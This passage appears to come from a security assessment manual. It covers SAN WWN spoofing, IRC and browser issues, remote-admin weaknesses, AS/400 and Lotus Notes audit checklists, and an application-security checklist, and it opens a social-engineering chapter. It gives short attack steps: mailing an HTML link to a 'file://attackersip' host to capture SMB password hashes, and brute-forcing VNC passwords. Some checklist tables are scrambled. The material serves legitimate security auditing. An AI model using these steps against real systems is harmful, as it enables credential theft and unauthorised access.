unauthorized WWN to access the information of the spoofed WWN.
•
When you do the Soft Zoning based on the Port Number, if an unauthorized WWN
knows the route to another WWN in another zone then by enumerating the same in
fabric we can get the access
Page 822 of 1123
S.8.3 Find the Vulnerabilities in the Subsystems and the Media.
Results
•
If the LUN masking occurs at the client node using HBA drives, to allow the client
node to view all the LUNs that it has identified
•
To do this, open the Lun Masking properties of the client node, which doesn’t have
any authentication parameters. Change the settings to remove any and all masking
•
If the LUN masking is occuring on the FC switch , then a spoofed WWN would get
the LUN masking properties and through which we can view all the LUNS that it has
identified.
•
Lun Masking at the Storage Controller, the storage controller can be able to expose
certain LUNs to certain WWNs.In this case spoofing a WWN we will be able to
access the LUN segments.
Page 823 of 1123
S.9 GLOBAL COUNTERMEASURES
Best practices for the data-at-rest:
•
Secure data-at-rest in storage arrays, tape libraries, and NAS appliances through
access control, authentication, encryption, and compression.
•
Examine host based management access points via storage management software
to make sure it is secure and limits access to crucial data.
Best Practices for the data-at-flight:
•
Examine ways to secure the storage fabric against unauthorized/unauthenticated
SAN access, WWN spoofing, and different access point management controls.
•
Use Hardware enforced zoning in managed storage networks.
•
Examine metro SAN and WAN network connectivity to make sure data integrity is
preserved, and that data is encrypted during its travels in data protection, remote
replication, and mirroring technologies.
•
Make sure storage networking equipment supports integration with IPSEC, VLAN s
as well as RADIUS servers, firewalls and intrusion detection systems.
•
Create separate network infrastructure in support of the storage environment on both
Fibre channel and ip.
Best Practices for the Data-in-flight and Data-at-rest:
•
Align storage security strategy with broader corporate security strategies.
•
Identify the value of the data being protected, and map the data paths within the
environment that support that data-at ensure it fully protected at-rest in and in-flight.
•
Determine whether or not a security stack is required to support certain types of
application data, such as whether or not various classes of data need to be
encrypted with different keys.
•
Make sure default passwords for storage networking gear and storage management
tools are changed before being placed in production environments.
•
Make sure remote sites have consistent security procedures and policies with
corporate data center as well as the SAN environment.
Page 824 of 1123
•
Consider role-based management policies for management of the storage network
itself.
•
Harden file and database access control by suing authentication and encryption
appliances.
•
Evaluate security procedures prior to deploying new technologies such as iSCSI,
Fibre channel trunking, network based virtualization tools, and FCIP.
•
Evaluate the storage security hot spots to make sure full security protection is in
place to support authentication, integrity, confidentiality, availability and no
repudiation.
•
Consider system and procedures around monitoring storage security events such as
failures, violations and warnings.
•
Test changes in configuration and new SAN fabric extensions for security holes
before rolling out production.
Page 825 of 1123
T INTERNET USER SECURITY
T.1 IRC SECURITY ISSUES
IRC (Internet Relay Chat) have been around for decades now. It is one of the most
popular ways of communication. With the facilities, IRC comes with the insecurities as
well. Followings are some of the security issues related to IRC:
1. IP revelation
2. Malicious code transfer
3. P2P files sharing (DCC)
4. DoS and buffer overflow on IRC clients.
5. Trojans use irc to conect to IRC servers and anounce their presence on victim
network.
6. Social Engineering attacks
Countermeasure[s]
1. Do not use IRC on production systems. It's a mean for entertainment and not for
productivity.
2. Disable DCC capability if IRC shall be used.
Page 826 of 1123
T.2 INTERNET EXPLORER INSECURITIES
Ever since the birth of internet people are using different browsers to access it. Windows
come equipped with IE (internet explorer) and it becomes default browser for most of the
people using windows. Another popular browser is Netscape. Off late it has been the
target of many malicious attacks. Georgi Guninski is one of the pioneers in the research
on IE vulnerabilities. He has listed out many vulnerabilities and their testing on his
excellant security page which one must see for browser testing.
Steps to be taken
1. For Internet Explorer testing go to http://www.guninski.com/browsers.html
2. For Netscape Testing go to http://www.guninski.com/netscape.html
Countermeasures
Apply the suggested patches
Page 827 of 1123
T.3 MICROSOFT OUTLOOK INSECURITIES
Outlook is one of the most frequently used programm for emails. It has various
vulnerabilities which can be used for malicious purpose ranging from infecting a system
with a worm to remotely grabbing SMB hashes. Some of the examples can be the
worms like "i love you" or "malissa" who abused outlooks settings. Here we will
demonstrate a way to grab SAM hashes from a remote machine by sending a mail.
Pre-requsite
1. HTML parsing shall be alowed (which is allowed by default).
Steps to be Performed
1. Send a file to target in html format with an image link like
<a href="file://attackersip/images/image.gif">
2. Fireup lopht cracks SMB capture utility.
3. As soon as victim opens the mail, outlook try to access the file using the current users
credential
4. Capture the SMB challange exchage and crack
Example/Results
<screenshot>
Observation:
Attacker was able to grab the SMB hashes from the wire by just sending one mail.
Countermeasure[s]
Disable Html parsing in outlook.
Page 828 of 1123
T.4 REMOTE ADMINISTRATION SECURITY
Some of the very common Remote Administration Security Services are as follows:
•
VNC
•
Microsoft Terminal Server
•
ControlIT
•
PCAnywhere
T.4.1 VNC
VNC (Virtual network computing) is used widely by many system administrators for
remote administration. It supports web-based interface & client interface. The client
interface can be GUI based as well. Client is known as VNC viewer. VNC have a
security feature which ask for password before letting the client connect to server. The
problem with VNC is it's passwords are 8 characters or smaller and VNC have no
concept of users. This makes dictionary attacks very easy. Patrick Oonk have written a
patch for VNC viewer which converts it into a dictionary based bruteforcer. The pach can
be
downloaded
from
http://www.securiteam.com/tools/Brute_forcing_VNC_passwords.html
Steps to be performed
1. Apply patch to the VNC viewer
2. Specify the target and port to connect
3. Specify Dictionary
4. Start cracking
Example Results
<Screenshot>
Observation
Attacker cracked the simple, dictionary based password and gained acces to the system.
Page 829 of 1123
Countermeasure
Use UNIX -localhost or Windows LoopbackOnly or kernel packet filters to restrict access
to TCP services, e.g. to force users to tunnel their VNC sessions through SSH for more
security.
Page 830 of 1123
Page 831 of 1123
U AS 400 SECURITY
U.1 USER IDENTIFICATION: SECURITY LEVEL
Description
The system parameter QSECURITY is set to level 30.
Analysis/Conclusion/Observation
Level 30
Impact
This level of AS/400 security provides for user authentication and security over the AS/400
object by the operating system. However, this level of security has a few disadvantages for
the integrity of the AS/400.
Countermeasures
The security level should be set to 40. In order to find out whether all applications which
currently run on the AS/400 will still run under security level 40, you can make use of
*AUTFAIL and *PGMFAIL in the audit-logging.
Tool[s]
By manual checking
Further Reading[s]
Remarks
Page 832 of 1123
U.2 USER IDENTIFICATION: KEYLOCK SWITCH
Description
The key lock switch is set to NORMAL.
Analysis/Conclusion/Observation
NORMAL.
Impact
The position of the key lock switch does not guarantee the integrity of the AS/400. The
system may be manually switched off and on.
Countermeasures
The key lock switch should be set to SECURE.
Tool[s]
By manual checking
Further Reading[s]
Remarks
Page 833 of 1123
U.3 USER IDENTIFICATION: KEY KEYLOCK SWITCH
Description
The key to the key lock switch is not kept in a secure place and is accessible by
unauthorised personnel.
Analysis/Conclusion/Observation
No
Impact
Unauthorised actions may be performed on the AS/400 such as the execution of an IPL.
Also, employees may be able to access the Dedicated Service Tools through which,
among other things, the password of QSECOFR may be reset.
Countermeasures
The key to the keylock switch should be kept in a secure place which is only accessible by
authorised personnel.
Tool[s]
By manual checking
Further Reading[s]
Remarks
Page 834 of 1123
User Identification: System value QINACTITV
Description
The system value QINACTITV is set to more than one hour. This means that the system
will take action after a workstation has been inactive for a time interval of more than one
hour. What action the system will take depends on the system value QINACTMSGQ and
ADSCJOBITV
Analysis/Conclusion/Observation
More than 60
Impact
Because the system will only take any action after a workstation is inactive for more
than one hour, an active workstation may be left unattended by the user. This increases
the risk of unauthorised access to the workstation
Countermeasures
The value of the system parameter QINACTITV should be set to 20 minutes.
Tool[s]
By manual checking
Further Reading[s]
Remarks
Page 835 of 1123
U.4 USER IDENTIFICATION: SYSTEM VALUE QDSCJOBITV
Description
The system parameter QDSCJOBITV is set to less than 60 minutes.
Analysis/Conclusion/Observation
Less than 60
Impact
It is not recommended that a job be prematurely aborted and ended.
Countermeasures
The system parameter QDSCJOBITV should be increased to 180 (three hours).
Tool[s]
By manual checking
Further Reading[s]
Remarks
Page 836 of 1123
U.5 USER IDENTIFICATION: VIRTUAL DEVICES
Description
The system parameter QAUTVRT is set to more than 10.
Analysis/Conclusion/Observation
More than 10
Impact
Because of this, an unauthorised person can try to guess a user password from one
physical device. The number of guesses he can make equals the value set for the system
parameter QAUTOVRT times the value set for the system parameter QMAXSIGN. This
increases the risk of unauthorised access to data, applications and system software.
Countermeasures
The system parameter QAUTOVRT should be set to zero.
Tool[s]
By manual checking
Further Reading[s]
Remarks
Page 837 of 1123
U.6 USER IDENTIFICATION: SYSTEM VALUE QLMTSECOFR
Description
The system parameter QLMTSECOFR is set to value 0. Because of this, user profiles with
powerful special authorities (*ALLOBJ en *SERVICE) are able to logon to the system from
any available workstation.
Analysis/Conclusion/Observation
Value 0
Impact
The possibility to use user profiles with powerful special authorities from any workstation,
decreases the effectiveness of logical access controls. Through limiting the number of
workstations that can be used to work with powerful user profiles, logical access controls
over these user profiles is increased with physical access controls over the workstations
which these user profiles may use. This increases the overall level of security.
Countermeasures
The system parameter QLMTSECOFR should be set to one. Thus, user profiles with
powerful special authorities (*ALLOBJ and *SERVICE) may only be used from pre-defined
workstations.
Tool[s]
By manual checking
Further Reading[s]
Remarks
Page 838 of 1123
U.7 USER IDENTIFICATION: LIMITED DEVICE SESSIONS SYSTEM LEVEL
Description
The system parameter QLMTDEVSSN is set to value 0. This enables the user to logon to
the system from various physical workstations at the same time. It also enables the user to
have more than one session simultaneously active.
Analysis/Conclusion/Observation
Value 0
Impact
The possibility for users to log on to the system through various physical workstations at
the same time may lead to user profiles being shared by different users. Also, workstations
may be left unattended by the rightful user. This may lead to unauthorised access to data,
applications and system software.
Countermeasures
The system parameter QLMTDEVSSN should be set to value 1.
Remark:
If certain users need to have more than one session active at the same time, an exception
can be made for these users on the level of their individual user profile.
Tool[s]
By manual checking
Further Reading[s]
Remarks
Page 839 of 1123
U.8 USER IDENTIFICATION: SYSTEM PARAMETER QMAXGNACN
Description
The system parameter QMAXGNACN is set to value 2.
Analysis/Conclusion/Observation
Value 2
Impact
If only the virtual device is blocked, an unauthorised individual may try and guess the
password of the same user profile again on the same physical device, using another virtual
device.
Countermeasures
The virtual device as well as the user profile should be blocked when the maximum number
of unauthorised access attempts has been reached. This can be achieved through setting
the system parameter QMQXGNACN to three.
Tool[s]
By manual checking
Further Reading[s]
Remarks
This risk does not exist when the system parameter QAUTVRT is set to zero. In this case,
virtual devices are not automatically configured. If every user profile only has one virtual
device, an unauthorised individual cannot logon to the system again under the same user
profile.
Page 840 of 1123
U.9 USER IDENTIFICATION: PUBLIC AUTHORITIES
Description
The system parameter QCRTAUT is set to *CHANGE. Because of this, the public has
*CHANGE rights over newly created objects.
Analysis/Conclusion/Observation
*CHANGE
Impact
The public authority to change newly created objects might sometimes be too extensive.
This may endanger the integrity of the AS/400 data.
Countermeasures
The system parameter QCRTAUT should be set to *USE. In this way, newly created object
may only be used by the public.
Tool[s]
By manual checking
Further Reading[s]
Remarks
Sometimes (e.g. for devices) the right *USE may be too limited to work with the object. In
these cases, the public may need more extensive rights over the object (*CHANGE rights
should be sufficient).
Page 841 of 1123
U.10 USER IDENTIFICATION: AUTHORITY ADOPTION
Description
Applications adopt more authority required to meet the application requirements.
Analysis/Conclusion/Observation
No
Impact
Allowing a program to run using adopted authority is an intentional release of control. You
permit the user to have authority to objects, and possibly special authority, which the user
would not normally have.
Countermeasures
Applications should be adopting the minimum authority required to meet the application
requirements.
Tool[s]
By manual checking
Further Reading[s]
Remarks
Page 842 of 1123
U.11 USER IDENTIFICATION: MACHINE ROOM
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
The machine room should be water-proofed and fire-proofed. The door should be locked to
control the entrance. Only authorized personnel should be able to gain access to the
machine room. Each entrance should be logged for preventing unauthorized access.
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 843 of 1123
U.12 USER IDENTIFICATION: UPS ( UNINTERRUPTABLE POWER SUPPLY)
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
You should determine whether or not the company has a UPS system. If it does, you
should check UPS-related controls to ensure the UPS allows for a normal shutdown in
case of a power outage.
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 844 of 1123
U.13 USER IDENTIFICATION: WORKSTATION / TERMINAL
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
Company policy should prohibit recording the confidential information (for example, signon,
and other activities that involve password entry) on workstation/terminal record/play keys.
You should perform a spot check of workstations/terminals to assure the compliance with
these policies. If there is a key for keyboard lock at the workstation/terminal, ensure the
keyboard is locked and the key is removed when the workstation/terminal is inactive.
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 845 of 1123
U.14 USER IDENTIFICATION: BACK UP TAPES
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
Consult the
Plan to protect the business processes to see how the backup routines,
including labeling and storing of the tapes, are performed. Verify that these routines are
followed, and check if anyone is able to steal, duplicate or borrow a tape without being
noticed.
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 846 of 1123
U.15 USER IDENTIFICATION: REGISTER A NEW USER
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
Some sort of routine must be followed when a new user profile is created. The
person who registers new users should receive a form that contains at least the
following:
The name of the user
The user class
Any deviation from the default values in the CRTUSRPRF command, verified
by the person responsible for the AS/400 security
Authority to the applications, verified by the application owners
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 847 of 1123
U.16 USER IDENTIFICATION: REGISTER A USER WHO LEAVES
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
Some sort of routine must be followed when a user leaves the company, or gets
a leave of absence. A form should be filled out and given to the person
responsible for AS/400 security.
Before deleting a user profile, are the following must be checked:
If the user has programs that adopts his authority
If the user owns other objects: if so, who decides if they are to be deleted, or
transferred to a new owner.
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 848 of 1123
U.17 USER IDENTIFICATION: APPLICATION AND OWNERSHIP
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
Which applications should be secured.
Which applications (if any) must not be secured.
Which applications are continuously being changed, and which are
frozen 
Which libraries are included in an application.
Who within the company are the owners of the different applications.
Which user profiles own the objects within an application. Ownership is
extremely important and plays a key role in a secure system.
Who can request changes to an application, and how are these request for
changes documented and carried out.
Tool[s]
Manual check
Further Reading[s]
Remarks
Note: QUSRTOOL has a program, CHGLIBOWN, that can change the owner of a library,
and all the objects within the library. This is a very powerful tool.
Please don’t use it until:
o
The owner of the application agrees that a change should be made. The owner may
have detailed knowledge and must always be consulted.
o
You have changed the owner of the library manually and see that it works. Whenever
Page 849 of 1123
you make a change of ownership, you must be able to reverse the process if something
does not work properly afterwards.
o
You know if the library contains programs that adopt their owners authority.
Page 850 of 1123
U.18 USER IDENTIFICATION: DAY-TO-DAY MONITORING
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
o
New objects created by system users
o
New users enrolled on the system
o
Changes of object ownership - authorization not adjusted
o
Changes of responsibilities - user group changed
o
Temporary authorizations - not revoked
o
New products installed
o
Maintenance applied - security level lowered and not reset, and so on
The best way to keep an eye on what is happening on the system is to use the audit journal
(QAUDJRN). Many types of events, such as security violations, changes to user profiles,
work management, and network attributes, are logged in the journal receiver.
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 851 of 1123
U.19 USER IDENTIFICATION: CRITICAL USER PROFILES
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
Critical User Profiles should be checked regularly, such as profiles with special authorities
and IBM-supplied user profiles where the default passwords are published.
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 852 of 1123
U.20 USER IDENTIFICATION: PRIVILEGED PROFILES
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
All User Profiles with special authorities such as *ALLOBJ,
*SECADM and *AUDIT should be extracted and compared with an authorized list
of such users. The analysis should include other properties like
PASSWORD(*NONE).
The DSPAUTUSR command will print the following information for all User
Profiles:
User Profile name
Group Profile name
Date password was last changed
An indicator if the password is *NONE
Description text
To do this, enter:
DSPAUTUSR OUTPUT(*PRINT)
To print other User Profile information, enter:
DSPUSRPRF USRPRF(User Profile) TYPE(*ALL) OUTPUT(*PRINT)
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 853 of 1123
Page 854 of 1123
U.21 USER IDENTIFICATION: IBM-SUPPLIED USER PROFILES
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
IBM-supplied user profiles should be checked in the following ways:
For the user profiles designed as object owners or batch processing, you should verify
that their password are all *NONE to prevent them being used to sign on to the system.
for the user profiles shipped with default passwords, you should verify that these
passwords cannot be used to sign on. The default passwords should be changed
immediately after installing the system. In addition, they should be changed periodically (in
case they become known, are reset to the defaults, and so on). But you still should verify
that the rest of parameters except the password have not been changed.
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 855 of 1123
U.22 USER IDENTIFICATION: CRITICAL OBJECTS
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
The public and specific authority should be checked to see that it meets the security
guidelines or objectives.
List of Critical System Objects:
QSYS
QUSRSYS
QHLPSYS
QGPL
QDOC
QBASE
QCTL
QBATCH
QINTER
QCMN
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 856 of 1123
U.23 USER IDENTIFICATION: EVENT MONITORING
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
The journal files and history log contain, among other information, the security-related
events that must be monitored. It is necessary that this information be extracted and
documented in security reports for management review. We suggest the following priorities:
1. Analyze the reported changes to security definitions and rules.
2. Analyze the access granted to highly critical objects.
3. Analyze the attempted violations.
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 857 of 1123
U.24 USER IDENTIFICATION: ACCESS TO CRITICAL OBJECTS
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
The access authority (but not an access log) to a specific object can be printed
with the following command:
DSPOBJAUT OBJ(library/object) OBJTYPE(type) OUTPUT(*PRINT)
For the program GRPPRFR1 in library SECURITY, you would enter:
DSPOBJAUT OBJ(SECURITY/GRPPRFR1) OBJTYPE(*PGM) OUTPUT(*PRINT)
For the users in the authorization list (if one exists for the object), you can use
the following command:
DSPAUTL AUTL(AUTL1) OUTPUT(*PRINT)
Where AUTL1 is the name of the authorization list.
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 858 of 1123
U.25 USER IDENTIFICATION: SECURITY-RELATED SYSTEM VALUES
Description
Analysis/Conclusion/Observation
Impact
Countermeasures
Security-related system values (for example,
QSECURITY, QMAXSIGN, and so on) should be reviewed to see that effective global
security values have been established.
Tool[s]
Manual check
Further Reading[s]
Remarks
Page 859 of 1123
V LOTUS NOTES SECURITY
Sr.
Check
Control
Compliance
No
1
[Yes/No/N.A.]
Securing the
Controlling the ID file and Password is rarely addressed properly.
ID File
The password is associated with the Notes ID file. Authentication
is with the ID file - not a server. There can be more than one copy
of the ID file for any person. Each copy can have a different
password or they can all have the same password. If a user has
multiple computers - Home, work, London, Paris the user can
have an ID file on each PC each with a different password. If the
user changes their password on one PC it won't synch to the other
and it won't affect the ability of the user to logon with another copy
of the ID file. Each copy is independent of the others.
Therefore if the notes Admin creates the file, he also knows the
password and often keeps a copy for himself. Therefore the notes
Admin
always
has
access
to
users
emails.
An ID Management Solution:
One solution of securely managing IDs is for two parties to be
involved in the creation of the ID. Perhaps the Notes admin and a
representative from HR. The Notes admin will generate the ID and
HR will create (a unique password) and hold the password. HR
can inform the user of the initial password and the Notes admin
can deliver it. That way no one person or group has both the ID
and password in their possession except the end-user.
Expiration of
All ID files must be set to expire in at least 2 years
ID Files
Page 860 of 1123
Comments
2
STMP
Spammers constantly lookout for SMTP gateways that allow
Relaying is
relaying of email from any users. The Lotus notes server must be
secured
configured to allow the server to only relay emails for the
authorized users.
This feature is available in Lotus Notes version 4.6.2 or later
In NOTES.INI, set:
SMTPMTA_REJECT_RELAYS=1
SMTP_OCH_REJECT_SMTP_ORIGINATED_MESSAGES=1
-
(NOT "SMTPMTA_OCH_..")
SMTPMTA_RELAY_FORWARDS=1
WARNING:
If
SMTPMTA_OCH_REJECT_SMTP_ORIGINATED_MESSAGES=1
is
used,
the
host
will
still
relay.
Check
your
spelling!
For Notes 5.x:
The configuration document in the Domino Directory has a section
for SMTP Inbound Controls. Enter a * in both of the following
fields:
"Deny messages from external internet domains to be sent to the
following internet domains:"
"Deny messages from the following external internet hosts to be
sent to external internet domains:"
3
Encryption
If your users require encrypted content with people outside your
Notes domain you will need to employ an S/MIME solution. That
entails managing some keys that Notes does easily.....when you
know how.....just find someone who knows how to do it well and
you'll be fine. Don't let the inmates run your S/MIME asylum. You
may have regulatory requirements to be able to monitor mail
content. If you're not managing the encryption then you may find
yourself unable to meet regulatory requirements.
Port
Enable port encryption for all ports
Encryption
Page 861 of 1123
Database
All important Databases must be encrypted
encryption
4
Restrict use
Use iNotes only if the remote PC is secured.
to iNotes
attachments are left on the remote PC.
Temp files,
VPN / SSL VPN products claim to clean up temp directories and
they do an excellent job in a normal disconnect. If the connection
drops or the remote PC hangs the VPN won't help you clean up
anything.
They do not guard against spyware, key loggers etc. Blackberries
may be considered
4
Check backup
Check to see if the Backup Software can back up open files
softwares
5
Check for
Check to see if the server has been connected to a UPS
UPS
availability
6
Check to see
Database templates and the design task should be used to
utilisation of
maintain databases. Procedures must be implemented that require
design
database designers to utilize design templates when making
templates
changes to production Domino applications. This helps to restrict
during
the database designers’ access to production data. This is
application
accomplished by forcing the database designers to make all
development
database changes to database templates. Changes to the
templates, which do not include production data, are automatically
applied via the design task at 12 p.m. every evening (over
whenever scheduled).
7
Remove
Stop all unnecessary services and remove non Lotus Notes
unnecessary
related software.
services and
task
8
Modem
If the server has a modem attached to it, all calls must be logged.
Connectivity
Page 862 of 1123
9
Anti Virus
The mailing solution must have anti virus. It will help if the OS to
has anti virus protection
10
Latest
Check to see if the OS and Lotus Notes have the latest patches
Patches
11
OS Hardening
Check to see if the OS is hardened as per best practices
12
Avoiding
Check to see if the Administrator reviews the replication logs for
replication
conflicts
Conflicts
13
Duplicate
Multiple replicas of a database should not be kept on one Domino
copies of
servers. Utilize the Database Copy functionality within Domino to
databases
make a a copy as the new database copy will have a unique
replica ID.
14
15
User
Check to see if Procedures exist to delete users as they leave the
Maintenance
organization. The List must be up to date.
Password
Passwords must be configured to be at least 8 characters long
Controls
16
Access
All databases and their replicas must have access control lists.
Control Lists
Internet access for each database must also be configured
accordingly. Default and anonymous connections to databases
must also be set to no access.
17
18
OS Level File
Check to see that access control has been implemented on the
Access
OS
Usage of
Fully qualified Names must always be used
Fully Qualified
Names
19
Group
Groups should not be cascaded down to more than five levels
Cascading
20
21
Review
Access control to the following files must be reviewed:
Access
LOG.NSF,
Control to
CERTLOG.NSF,
important files
STATS*.NSF, WEBADMIN.NSF, DOMCFG.NSF
Restriction to
Creation of databases must be restricted to select users.
STATREP.NSF,
NAMES.NSF,
ADMIN4.NSF,
EVENTS4.NSF,
CATALOG.NSF,
MAIL*.BOX,
create
databases
Page 863 of 1123
22
Deny
Verify that the “Allow anonymous Notes connections:” option has
Anonymous
been set to “No” on all applicable Domino server documents.
connections
23
24
Domino as a
Run the Domino as a service and set it to start automatically when
service
the machine boots.
NSF Formats
All databases must have NSF extensions to avail all security
features.
25
Select only
Verify that only one protocol is used for communication
one protocol
for access
26
Protect the
Inspect the Passthru section of the server document on all
Passthru
servers. If Passthru is used review the group members and ensure
Functionality
that necessary people only are members of the Passthru users
group.
27
Review of
Check that procedures exist to review session logs, User activity
LOGS
logs for critical databases, replications logs, certification logs, mail
routing logs
28
Seggregation
The Live, testing and Development environment must be different
of
development,
testing and
Live
environment
29
Licenses
Check to see if all users are licensed
30
Trained
Check to see if the administrator is a Lotus Notes Certified
Administrators Administrator
Page 864 of 1123
W SOURCE CODE AUDITING
[Details on this section will be provided in next release of ISSAF]
Page 865 of 1123
X BINARY AUDITING
This document attempts to give the user conceptual knowledge on some aspects like
binary auditing and disassembly. This shall be covered with a brief explanation of
concepts like memory in modern operating systems. Then the auditing covers aspects
like understanding network packets and also stand alone auditing by tracing system
calls. This assumes that the reader has a basic understanding of concepts like sockets
and system related functions. Following this, the PE structure shall be examined briefly
to explain how analysis can be done for PE files.
Considering the nature of the topic in discussion, it's generally overwhelming for the
reader to cover so many aspects in Binary Auditing. Hence, the purpose of the document
is to be a jumpstart for the reader so that he can follow binary auditing with ease and be
ready to start work on his own. This document is by no means a complete guide to the
subject nor do the authors take responsibility for the results that the reader might
encounter while trying out the steps mentioned.
X.1 METHODOLOGY
Some of the methods that involve detecting vulnerabilities in software can be broadly
divided into the following:
•
Fuzz testing
•
Stress testing
•
Binary auditing
[Details on this section will be provided in ISSAF release 1.0]
Page 866 of 1123
Y APPLICATION SECURITY EVALUATION CHECKS
Introduction
Applications Security
Applications security ensures that operational applications supporting a business process
are purchsed, developed, deployed and maintained in a secure manner
Prerequisite
Minimum baseline standard established for each component
Current configuration items from each component
Objective
To identify gaps in minimum baseline standard for each component
To identify gaps in current confirmation items
Evaluation Check
1
Have the following been considered during
application design
1.1
1.2
1.3
1.4
Structure design methodoloty used
Processing requirements of application
Performance requirements
cosiderations for operational
configuration and transaction processing
requirements
consideration for use of code in other
applications
1.5
1.6
1.7
1.8
ease of installation
Operational requirements
Consideration relating to application
processing at multiple locations
1.9
1.10
1.11
1.12
1.13
1.14
1.15
Future change requirements
Security requirements
Auditabililty considerations
Help text and training manuals
external third party requirements
System Desing Documentation
Independent examination for security
requirements
1.16
1.17
Data communications requirements
System requirements specification
document
Secuirty requirements specification
document
Checks for incomplete, incorrect or
inconsistent data processing with in
application, and between other
applications/systems
1.18
2
2.1
2.2
Yes
No
N/A
Evaluation Performed and
Results
Is the application developed in house
Is the application purchsed from a vendor
Page 867 of 1123
2.3
Is there available a complete security
requirements specification document.
2.4
Is there an internal development,
maintenance, testing and user support
team
Was the experience of personnel that
developed the application evaluated
Is there appropriate segregation of
responsibilities between developers
inclusing the testing team
2.5
2.6
2.7
2.8
2.9
3
4
5
Is the source code strictly controlled
Is there appropriate segregation of
testing, development and production
facilities
Is there sufficient staff to support the
application database and the underlying
operating systems
Is application development outsourced?
Do external contract staff for development
sign confidentiality agreements and
NDA's?
Are there sufficient escrow agreements
undertaken with the application vendor?
6
Are audit trails and logging performed on
development, source code library and
operational systems
7
Each line of code has been reviewed or a
walkthrough performed
Are application program staff aware of
security requirements for the application
8
9
Comprehensive testing is performed before
the application is deployed for production
10
Does testing include to verify that access
control, audit and validation mechanisms
function correctly
11
Does testing include reaction to error
conditions and out of sequence records?
12
Is access to development source programs
restricted to programmers that are
developing the software
Are program libraries regularly backed up?
Are all program changes authorised by
appropriate management?
13
14
15
Is there a design for choosing passwords
during development?
16
17
Are devlopment user-ids shared?
Is there automatic terminal time out facility
available?
Page 868 of 1123
18
19
Are there sufficient procedural controls?
Is data input into application subject to
appropriate validation controls? Are the
following validation checks considered:
20
21
22
23
24
25
out of range checks
invalid characters in fields
missing or incomplete data
exceeding data volume limits
unauthorised control data
session or batch controls
26
27
28
29
30
31
32
balancing controls
validate system generated data
check transfers between computers
hash totals of files
programs run at correct time
programs run in correct order
Is there message authentication
performed?
Does implementation of a new system or
upgrade to an existing system is performed
with appropriate change menagement? Are
the following considered:
33
34
35
36
37
38
39
40
S/w update by program librarian
Executable code only
Evidenced acceptance & testing
Audit log of library updates
Previous s/w revisions maintained
Is system test data appropriately controlled
and protected?
Is test data subject to same controls as
live data?
41
Is a change control procedure is place?
42
Is the security change of operating systems
reviewed for impacted on the application
systems?
43
Are vendor supplied packages modified?
44
Does acces to program source libraries
restricted to program librarian?
45
Is a formal risk analysis performed before
performing the modifications?
46
are programs identified for trojan code and
covert channels
47
48
is output data from programs validated?
Is cryptography considered for
applications?
Page 869 of 1123
Page 870 of 1123
9 SOCIAL ENGINEERING
Social Engineering type of attacks is by far the simplest methods of gaining information
without actually compromising the security tools deployed on the information systems.
According to Webster’s dictionary it is “the management of human being in accordance
with their place & function in society, applied social science”. Through a successful
social engineering attack a hacker can easily get information by asking for it instead of
having to break or subvert security measures installed on information systems.
Most information systems depend on a certain level of trust for their functioning. E.g.
Large Organizations depend heavily on e-mail and remote access for communication
and often all users are assigned user-id passwords for their access. In case the users
misplace their passwords they have the flexibility of calling the IT Helpdesk and getting
their passwords changed. When a user calls the IT Helpdesk for resetting access, there
is a certain level of trust established between the user and the helpdesk analyst. A
hacker tries to create this trust to gain valuable information from the helpdesk analyst.
What is Social Engineering?
Social Engineering: Term used among crackers for cracking techniques that rely on
weaknesses in wetware rather than software; the aim is to trick people into revealing
passwords or other information that compromises a target system's security. Classic
scams include phoning up a mark who has the required information and posing as a field
service tech or a fellow employee with an urgent access problem.
The term "wetware" refers to the mind of the target/mark, or the people you try to social
engineer.
Social engineering cannot be based upon scripts, as all people are different from one
another, you have to rely on what you know about the company/person, and your own
spark of creativity to gain the information needed.
What are the Benefits of Social Engineering?
Using social engineering technics, the auditor/pen-tester can gain sensitive information,
like user credentials, usernames and passwords, from people working in the autited
company/organisation, exploiting the most vulnerable part of the security system, the
human part.
Page 871 of 1123
This technic it’s the most rewarding method of gaining information from a target/mark
without actually deploy any virtual tools or methods of virtual attack to gain the sensitive
information needed.
The auditor must use this method first, because it can give him a good starting point to
further exploit the company/organisation that he targets.
Through social engineering, one can gain the highest level of access on a system
sometimes, with ease and being virtually untraceble by the target. Regular accounts to
start with or even high level access acounts can be obtained using social engineering.
Also information regarding the topology of the audited company/organisation, as in
hardware and software information that can lead to a more easily way of compromising
the security of the audited company/organisation.
Types of Social Engineering
Social Engineering can be broken into sub-types like:
•
Regular social engineering – direct contact with the target/mark by phone, email or
other methods of communication to gain the information required.
•
Reverse social engineering – create a unussual situation for the target/mark to
handle and offering outside help, one can gain sensitive information from the
target/mark through this process.
Purpose
The purpose of this document is to offer a good level of information regarding the
gathering information method known as “Social Engineering”, so the auditor/pen-tester
can understand and deploy this method to gain the information needed during an audit
for a company/organisation.
Requirement
The requirements for this method of gaining information to work are: a good
understanding of the company’s/organisation’s enviroment and a good understanding of
the ways to manipulate a person to gain trust and then to exploit this level of trust to
obtain sensitive information from the target.
Page 872 of 1123
Understand Organization’s environment
Before the auditor/pen-tester can start a social engineering session, a good knowledge
of the company’s/organisation’s enviroment is needed.
Things
like
hardware
and
software
infrastructure,
the
problems
the
